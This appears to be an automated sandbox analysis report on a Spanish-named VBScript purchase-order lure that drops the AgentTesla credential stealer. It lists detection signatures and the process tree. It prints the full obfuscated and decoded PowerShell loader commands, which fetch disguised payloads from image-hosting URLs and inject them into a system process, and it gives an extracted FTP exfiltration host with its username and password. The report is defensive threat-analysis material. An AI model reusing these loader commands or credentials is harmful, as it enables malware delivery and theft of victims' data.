Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
orden de compra.vbs

Overview

General Information

Sample name:orden de compra.vbs
Analysis ID:1430757
MD5:a9adf46657f51b2156df15d0205b2b68
SHA1:267f6ce51db2758acbbfa7e5889924675d6e82c9
SHA256:dbf832467044f498c73a6c65ed31c2aee84c8e6e90c2017524fe3a7e7b6f7205
Tags:vbs
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Connects to a pastebin service (likely for C&C)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6164 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\orden de compra.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 2656 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTre2DgTreDDgTreDgTreLwDgTrewDgTreDQDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre4DgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreEYDgTrecgBvDgTreG0DgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreUwBUDgTreEEDgTreUgBUDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBFDgTreE4DgTreRDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCDgTreDgTrePQDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBTDgTreHUDgTreYgBzDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTresDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTreUDgTreBSDgTreE8DgTreSgBFDgTreFQDgTreTwBBDgTreFUDgTreVDgTreBPDgTreE0DgTreQQBDDgTreEEDgTreTwDgTreuDgTreFYDgTreQgDgTreuDgTreEgDgTrebwBtDgTreGUDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreG0DgTreZQB0DgTreGgDgTrebwBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTreuDgTreEcDgTreZQB0DgTreE0DgTreZQB0DgTreGgDgTrebwBkDgTreCgDgTreJwBWDgTreEEDgTreSQDgTrenDgTreCkDgTreLgBJDgTreG4DgTredgBvDgTreGsDgTreZQDgTreoDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTresDgTreCDgTreDgTreWwBvDgTreGIDgTreagBlDgTreGMDgTredDgTreBbDgTreF0DgTreXQDgTregDgTreCgDgTreJwB0DgTreHgDgTredDgTreDgTreuDgTreG8DgTrecgBiDgTreG8DgTreeQDgTrevDgTreDQDgTreNQDgTrexDgTreC4DgTreMwDgTre0DgTreDIDgTreLgDgTrezDgTreC4DgTreMgDgTre5DgTreDEDgTreLwDgTrevDgTreDoDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCwDgTreJwBBDgTreGQDgTreZDgTreBJDgTreG4DgTreUDgTreByDgTreG8DgTreYwBlDgTreHMDgTrecwDgTrezDgTreDIDgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3744 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.orboy/451.342.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • AddInProcess32.exe (PID: 6160 cmdline: "C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.horeca-bucuresti.ro", "Username": "americas2@horeca-bucuresti.ro", "Password": "H*TE9iL;x61m"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.2973300391.0000000002A25000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000004.00000002.2962871474.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000002.2962871474.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        Process Memory Space: powershell.exe PID: 2656JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          Process Memory Space: powershell.exe PID: 2656INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0x77cf9:$b2: ::FromBase64String(
          • 0x7ef80:$b2: ::FromBase64String(
          • 0x80448:$b2: ::FromBase64String(
          • 0x80a5c:$b2: ::FromBase64String(
          • 0x81192:$b2: ::FromBase64String(
          • 0x8175d:$b2: ::FromBase64String(
          • 0x77b5e:$b3: ::UTF8.GetString(
          • 0x7ede5:$b3: ::UTF8.GetString(
          • 0x802ad:$b3: ::UTF8.GetString(
          • 0x808c1:$b3: ::UTF8.GetString(
          • 0x80ff7:$b3: ::UTF8.GetString(
          • 0x815c2:$b3: ::UTF8.GetString(
          • 0xa42c0:$s1: -join
          • 0x155e5b:$s1: -join
          • 0x46530:$s3: reverse
          • 0x48477:$s3: reverse
          • 0x55c31:$s3: reverse
          • 0x5a1b2:$s3: reverse
          • 0x63b49:$s3: reverse
          • 0x6f402:$s3: reverse
          • 0xac955:$s3: reverse
          Click to see the 4 entries
          SourceRuleDescriptionAuthorStrings
          4.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            4.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              4.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                4.2.AddInProcess32.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x343e7:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x34459:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x344e3:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x34575:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x345df:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x34651:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x346e7:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x34777:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                4.2.AddInProcess32.exe.400000.0.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                • 0x315ca:$s2: GetPrivateProfileString
                • 0x30c9c:$s3: get_OSFullName
                • 0x3230a:$s5: remove_Key
                • 0x324ba:$s5: remove_Key
                • 0x333b1:$s6: FtpWebRequest
                • 0x343c9:$s7: logins
                • 0x3493b:$s7: logins
                • 0x3764c:$s7: logins
                • 0x376fe:$s7: logins
                • 0x39051:$s7: logins
                • 0x38298:$s9: 1.85 (Hash, version 2, native byte-order)
                SourceRuleDescriptionAuthorStrings
                amsi64_3744.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                  Spreading

                  barindex
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.orboy/451.342.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.orboy/451.342.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }", Comm

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgT